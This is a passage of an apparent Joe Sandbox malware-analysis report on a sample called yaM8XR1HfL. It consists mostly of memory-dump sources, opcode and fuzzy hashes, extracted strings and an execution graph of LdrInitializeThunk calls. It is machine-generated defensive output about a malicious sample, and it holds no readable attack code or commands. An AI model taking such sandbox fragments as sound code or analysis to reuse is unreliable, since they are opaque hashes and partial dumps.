                • Opcode Fuzzy Hash: 0adb4977fc75bbfeeb0d77cb5642940d98c5dfb01d2ea614aade13653b63364a
                • Instruction Fuzzy Hash: 7F71FFB4E1120ADFCB04DF99D5888EEFBB1BF89310F18855AD455AB314D334A982CFA5
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5562f0a91f2f727c53bcc5a375f529b80456f97d503ff9181ee45b169f993725
                • Instruction ID: cda3c6a247e2e5378df7185893ed3b038f52da3aee8046baea2b1e5570f48821
                • Opcode Fuzzy Hash: 5562f0a91f2f727c53bcc5a375f529b80456f97d503ff9181ee45b169f993725
                • Instruction Fuzzy Hash: 486103B4E1420ACFCB05CF99C5889EEFBB1BF89310F14855AD455A7314D334AA82CFA5
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a382589739328920b01d8595932c2b7cc29f8eeaf03d7bd69492409bc47f8d1c
                • Instruction ID: 8128d35d165073b32dca9aae40a89a15ba867290e6326d1f4d625e6be323b6b3
                • Opcode Fuzzy Hash: a382589739328920b01d8595932c2b7cc29f8eeaf03d7bd69492409bc47f8d1c
                • Instruction Fuzzy Hash: EF5155B0D152598FEB54DFA9C844ADDBFF2BF88310F1481AAD40AAB251DB304A85CF50
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 636f837ecb61ff07b7527ddf77969f0ee2951c26edf27e598f7db647f4d36cc1
                • Instruction ID: 20b5e3f101085e4c3746a08f8b0b620e6b9383bf49e200ca631b49ec61794921
                • Opcode Fuzzy Hash: 636f837ecb61ff07b7527ddf77969f0ee2951c26edf27e598f7db647f4d36cc1
                • Instruction Fuzzy Hash: 2E512AB1E052199FDB58DF6AC9446DEFBF3BF89300F04D4AAD408AB224EB305A458F51
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39bca0dee27fc9690f5eef2c92af5722207125219970d67fde13da208bc6e4ee
                • Instruction ID: b40f3ed26fbe6950bdddb0be628fe5412d8f5c5161d702c39fcd00eaa70b77b7
                • Opcode Fuzzy Hash: 39bca0dee27fc9690f5eef2c92af5722207125219970d67fde13da208bc6e4ee
                • Instruction Fuzzy Hash: 45518A71E057588FEB19CF6B8D55289BBF3AFC9200F18C1FA844CAA265DB340A468F11
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d1c2f9ca39170c991cd899baa7246898385007de4b84e506eafd9917fb61f60
                • Instruction ID: 8f5f152fbb76baacff032c6109d9e0ff8819f573521ce73a8b225903cc211b20
                • Opcode Fuzzy Hash: 2d1c2f9ca39170c991cd899baa7246898385007de4b84e506eafd9917fb61f60
                • Instruction Fuzzy Hash: D041F5B0E1520A9FCF44CFAAC4855EEFBF2BB89300F24D86AC415A7254D7349A41CF95
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 658cbe800da82a1d2dd87f55d892582f44e0aff257ea2880de1c0f6ee5e305d9
                • Instruction ID: 070c6e09998a266f29a2347557c9c5b7bd1a5a44c74b0b607ec35f9f4351551d
                • Opcode Fuzzy Hash: 658cbe800da82a1d2dd87f55d892582f44e0aff257ea2880de1c0f6ee5e305d9
                • Instruction Fuzzy Hash: 8941D6B0E1460A9FDF44CFAAC5855EEFBF2BB89300F24D86AC415A7254D734AA41CF94
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 22419c66bed2510a2c947d4d0ed010cbc1a7d1c9c909adf15a0969f61eb8cc3e
                • Instruction ID: a82a59bdab613fa088c1a2b92a5357a02416781cd4e59162549e0c730b19add7
                • Opcode Fuzzy Hash: 22419c66bed2510a2c947d4d0ed010cbc1a7d1c9c909adf15a0969f61eb8cc3e
                • Instruction Fuzzy Hash: 94414FB1E116198BDB58DF6B8D4579EFAF3BFC9301F14C1BA950DA6224EB3009458F11
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abd8257b1c294e372ec60c0fb7b021fe6dec3b3c390aaaa161a23a09dfa250c7
                • Instruction ID: f94bdd1b5d99c65f26dde703a91128d071d8dbac2ca1362cecc6e694106b8dc4
                • Opcode Fuzzy Hash: abd8257b1c294e372ec60c0fb7b021fe6dec3b3c390aaaa161a23a09dfa250c7
                • Instruction Fuzzy Hash: 7E414AB4E1424ACFCB84CFA8D94169EFBB2FB89300F20962AD506B7254DB349901CF18
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edd22ca2c42ed4b3e38d7454957cbb3aa5d6170fe6525e1fa509fe9809c8b70d
                • Instruction ID: 28bcba7f228bf75ac51ac96ba8bd2dc61bec41ebad8e118c9615b4bb58308149
                • Opcode Fuzzy Hash: edd22ca2c42ed4b3e38d7454957cbb3aa5d6170fe6525e1fa509fe9809c8b70d
                • Instruction Fuzzy Hash: F921F79280865C8BEB101D9D88615D52B80DB3F7A9B32238DD6747C1F7B549914BE3B1
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 364b00fe3ceaf5004425eeaf9ea64b2c684c057d36b548cfb3573ae7234efd6c
                • Instruction ID: ea4a6cfa79b835089a15871aa7bf51b7068cd7df407b777fd37ffe250761e160
                • Opcode Fuzzy Hash: 364b00fe3ceaf5004425eeaf9ea64b2c684c057d36b548cfb3573ae7234efd6c
                • Instruction Fuzzy Hash: 412138B1E116198BDB08CFAAD8405DEFBF7BFC9210F14C12AD418A7294DB345A01CB91
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 963154e40fc1e0e3f66ab2ed311e485a0f206f6d6dadabcca635b2d281ac71dd
                • Instruction ID: cef724269f0be8a9b0439bbdf4d2a78babb8271edf64c9663f4d328cacdc1162
                • Opcode Fuzzy Hash: 963154e40fc1e0e3f66ab2ed311e485a0f206f6d6dadabcca635b2d281ac71dd
                • Instruction Fuzzy Hash: 9A1147B1E112198BDB48CFAAE9406DEFBF7FFC8210F14C06AD408A7254DB305A018F51
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cf8529a34cd2aa27813872f1b5a0b753d79978ffe8a7318e292e3f2ec2f05838
                • Instruction ID: 61e51a7f522758988d88a38c38b08fc37e1c1bced282f582603b6fca4147e185
                • Opcode Fuzzy Hash: cf8529a34cd2aa27813872f1b5a0b753d79978ffe8a7318e292e3f2ec2f05838
                • Instruction Fuzzy Hash: 8F1159B1E112198BDB18CFABE8456EEFBF7BBC8210F14C03AE408A7314DB304A058B55
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a1c2f73d38391889ce77be6e87b160888accb0c9a163ef6637c789bcbfb585e
                • Instruction ID: d291c51d1009d4c9e5a9cf953c77c436d5b2ba9eb3408c7fa57ae934780f34dc
                • Opcode Fuzzy Hash: 2a1c2f73d38391889ce77be6e87b160888accb0c9a163ef6637c789bcbfb585e
                • Instruction Fuzzy Hash: A71144B1E1121A8BDB48CFAAD94069EFBF7ABC8310F14C12AD408A7214DB305A428B51
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f992b0a1c0d167efe6787505da0f78cb9b54481f0c5e371e0024202878756959
                • Instruction ID: 870293964393ef34e03ef15cffd9582e8ed159a376308ace94ea4cda520868b8
                • Opcode Fuzzy Hash: f992b0a1c0d167efe6787505da0f78cb9b54481f0c5e371e0024202878756959
                • Instruction Fuzzy Hash: B41114B1E116199BDB48DFAAD9406EEFBF7BBC8210F14C13AD409A7214DB305A428F91
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 92274a7f9cd3cb3769cef316e5d19102bf8d95ec041a0496e7bc738798081911
                • Instruction ID: 46f792e3eaebb7ded11cd11b53239290ccfa6389e9328dc5d5abef7a934c5daa
                • Opcode Fuzzy Hash: 92274a7f9cd3cb3769cef316e5d19102bf8d95ec041a0496e7bc738798081911
                • Instruction Fuzzy Hash: FE2117B0E116198BDB58CFAAD9416AEFBF7AFC9300F24C16AD408E7254DB305A15CB51
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd30320c56cf171001f8587c4e98bb711469d977b1fbcdf6a048317fedee4558
                • Instruction ID: 0e6f5b668a18f4f97c42a2066f40f0bef15b696d9893db44fe3863346826849a
                • Opcode Fuzzy Hash: dd30320c56cf171001f8587c4e98bb711469d977b1fbcdf6a048317fedee4558
                • Instruction Fuzzy Hash: 5C1156B1E112198BDB49CFAAD9506EEFBF3AFC8210F24C17AD408AA214DB304A418B51
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d8f2dc0a919bddc3ef11da183963f001b9759296bf2c4374d934449c3a91ffa
                • Instruction ID: c7cc718fc702d5c9d5dbe8fb3b4ddea35b96bf7ddd1c4255efa3c71c72c7cca4
                • Opcode Fuzzy Hash: 3d8f2dc0a919bddc3ef11da183963f001b9759296bf2c4374d934449c3a91ffa
                • Instruction Fuzzy Hash: 7E2126B1E116598FDB48CFAAD94169EFBF7BFC8310F14C16AD408A7214EB304A55CB51
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91abe60ce3f5acd24db4f0c7b5f229224c71dab270dbd26c62f560a20905edc4
                • Instruction ID: 8c7f5c9c5d74d17b6018629c4bd09f473ec10ceb2451015a8e711cf5e4815961
                • Opcode Fuzzy Hash: 91abe60ce3f5acd24db4f0c7b5f229224c71dab270dbd26c62f560a20905edc4
                • Instruction Fuzzy Hash: 05116AB0E122198BDB08CFAAD94569EBBF3BFC8310F14C16AD408A7364DB304A05CB15
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eab6aa48dc3331471fc1b3e95fb7b8a3b16e0fd95122c5e0bd9d7eac6d83c48d
                • Instruction ID: 0cf4edbd161025bec4367316feb9d56451d40ab56937133bf7fd5586236bc0d7
                • Opcode Fuzzy Hash: eab6aa48dc3331471fc1b3e95fb7b8a3b16e0fd95122c5e0bd9d7eac6d83c48d
                • Instruction Fuzzy Hash: 0E11B9B0E1161A8BDB48CFAAD9451DEFAF3BFC9310F14C12AD418A7294DB344A418F51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$B$B$Hgq
                • API String ID: 0-1012756375
                • Opcode ID: eb45ccde85d1f994c3dcec3f0b04c79fe003b5c69bec2f0883d49c4830a78441
                • Instruction ID: b794d18bedf2d8b03303baedd5c4766e39acad387f13a72c1647829fa59c8fe9
                • Opcode Fuzzy Hash: eb45ccde85d1f994c3dcec3f0b04c79fe003b5c69bec2f0883d49c4830a78441
                • Instruction Fuzzy Hash: 8951B1B1700206DFD714DF6DC48097ABBB6FF8925071485AAD529CB3A1DB31D842CB91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$B$B
                • API String ID: 0-685577651
                • Opcode ID: da6a36660f30b5d34bab4915e50f6f6f81cfdd7ddf35bcffd36ff08787ff902d
                • Instruction ID: b53122d31d308a37129a2d80fab967fe3fe1ff4c24957695dd89c1f052482863
                • Opcode Fuzzy Hash: da6a36660f30b5d34bab4915e50f6f6f81cfdd7ddf35bcffd36ff08787ff902d
                • Instruction Fuzzy Hash: A0219CF1B00216EFEB14CF6DC88497EBBB5EF8A21072441A6E526DB261D730D942CB95
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: \;cq$\;cq$\;cq$\;cq
                • API String ID: 0-2961067002
                • Opcode ID: 687dad33b4874cdeed49a860baff02bc70326711d9a7ee601106d5feb1866ec9
                • Instruction ID: d9c3e0a773299f2365a611ad022f1e8ec11da51892890200d5bf764117d0a0bd
                • Opcode Fuzzy Hash: 687dad33b4874cdeed49a860baff02bc70326711d9a7ee601106d5feb1866ec9
                • Instruction Fuzzy Hash: 9601D4717102059FCB248E2CC48092673E6AFEE764B2E907AE402EF3A0DB30EC41D752

                Execution Graph

                Execution Coverage: 0%
                Dynamic/Decrypted Code Coverage: 100%
                Signature Coverage: 40%
                Total number of Nodes: 5
                Total number of Limit Nodes: 1
                execution_graph 82135 14c2c00 82137 14c2c0a 82135->82137 82138 14c2c1f LdrInitializeThunk 82137->82138 82139 14c2c11 82137->82139 82140 14c2ad0 LdrInitializeThunk

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5 14c2b60-14c2b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7b75441e3979ebec0a08728ff4c9197d3288127061c8aad46063b6d6a74fcb44
                • Instruction ID: 4639442e80481dde93612ad6993612acd17c85473c606e7c53884caf3f70f4d6
                • Opcode Fuzzy Hash: 7b75441e3979ebec0a08728ff4c9197d3288127061c8aad46063b6d6a74fcb44
                • Instruction Fuzzy Hash: 8490026520241103450571584424626401A97F0201B55C022E10145A1DC63589916226

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6 14c2bf0-14c2bfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: def197d8805a021bd18d15c71037d9375a7dbc85d72e564f418874b8a0706f4d
                • Instruction ID: 06bd5004733390e9177442a93b9ea3d8c1dec0a77ee19254f40e6319dba6ac22
                • Opcode Fuzzy Hash: def197d8805a021bd18d15c71037d9375a7dbc85d72e564f418874b8a0706f4d
                • Instruction Fuzzy Hash: FC90023520141902D5807158441465A001597E1301F95C016E0025665DCB258B5977A2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4 14c2ad0-14c2adc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: fb91486ac62529e605e69513fb7a1945d22b2730c13c43b3de7cbd03546c12d9
                • Instruction ID: 5cd1d98db132ea6dbae6cfccb2e0de4333bf602dbf06bdf27dd55b64b6319e06
                • Opcode Fuzzy Hash: fb91486ac62529e605e69513fb7a1945d22b2730c13c43b3de7cbd03546c12d9
                • Instruction Fuzzy Hash: 5D90043D311411030505F55C07145170057D7F5351355C033F1015571CD731CD715333

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 9 14c2d10-14c2d1c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 27c16ec26163f9a07503f3581a259b0f9c6b65a8170a6aac0e901dad9c199a2f
                • Instruction ID: 8f9de0f14505c226f7f74d28c06bc5f4452eabad1088301921b67fbae3bca602
                • Opcode Fuzzy Hash: 27c16ec26163f9a07503f3581a259b0f9c6b65a8170a6aac0e901dad9c199a2f
                • Instruction Fuzzy Hash: 4C90022D21341102D5807158541861A001597E1202F95D416E0015569CCA2589695322

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 10 14c2d30-14c2d3c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b4b43ef3f8873576f7278260dbb8f4d7e74e4cba20107cccef5092b2444484f3
                • Instruction ID: e86b3825cb787c5d16f5647e2c44fcca1ac62613c15468590b3705a9b095dd90
                • Opcode Fuzzy Hash: b4b43ef3f8873576f7278260dbb8f4d7e74e4cba20107cccef5092b2444484f3
                • Instruction Fuzzy Hash: 4A90022530141103D540715854286164015E7F1301F55D012E0414565CDA2589565323

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 11 14c2dd0-14c2ddc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: fe44b76d1768a0cba46e2a8b8e04a55e2b8e81191a2dc062dec5ca8431a9ae69
                • Instruction ID: ce4dbc81f105bee37c58154a9377547457d2af2b5cacd36a005293849b04d115
                • Opcode Fuzzy Hash: fe44b76d1768a0cba46e2a8b8e04a55e2b8e81191a2dc062dec5ca8431a9ae69
                • Instruction Fuzzy Hash: D3900225242452525945B15844145174016A7F0241795C013E1414961CC6369956D722

                Control-flow Graph: 12 14c2df0-14c2dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c8407547e3b9781a02713f37d16134b1cf4d89cbe864bcd6e7364a4a0d8d0bb5
                • Instruction ID: 8611d201e41743b4f0811f0e4c503ac1a98d5e7fccb8b31bd49deb6e7116254c
                • Opcode Fuzzy Hash: c8407547e3b9781a02713f37d16134b1cf4d89cbe864bcd6e7364a4a0d8d0bb5
                • Instruction Fuzzy Hash: 4D90023520141513D51171584514717001997E0241F95C413E0424569DD7668A52A222

                Control-flow Graph: 7 14c2c70-14c2c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a7d476c76ee52e0b5f15de25e9b1296359e5b632c054fe9641fcbfbd544a016b
                • Instruction ID: 7c6a84d9b696c97391ccaee6eaa549fcb0e4daf792631a47772d433ce4482003
                • Opcode Fuzzy Hash: a7d476c76ee52e0b5f15de25e9b1296359e5b632c054fe9641fcbfbd544a016b
                • Instruction Fuzzy Hash: A190023520149902D5107158841475A001597E0301F59C412E4424669DC7A589917222

                Control-flow Graph: 8 14c2ca0-14c2cac LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: cbb6a73f60e8f8073d3784e50853760ae7f8ec0f947bbf40834869ef8910db2a
                • Instruction ID: 208e9bef2e5110b901e37eadc7906d11f72c9a8beaa3a00dcf14c2e0f9971479
                • Opcode Fuzzy Hash: cbb6a73f60e8f8073d3784e50853760ae7f8ec0f947bbf40834869ef8910db2a
                • Instruction Fuzzy Hash: 0E90023520141502D50075985418656001597F0301F55D012E5024566EC77589916232

                Control-flow Graph: 15 14c2f30-14c2f3c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 6acd05e6f4a3c3903d64ad42779d48374684c22199d65f815931964ffcd01678
                • Instruction ID: 97b4eba81561f3f34a26fe804593c91f0bf82e64600001a3445943c408c0bc39
                • Opcode Fuzzy Hash: 6acd05e6f4a3c3903d64ad42779d48374684c22199d65f815931964ffcd01678
                • Instruction Fuzzy Hash: E190026534141542D50071584424B160015D7F1301F55C016E1064565DC729CD526227
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
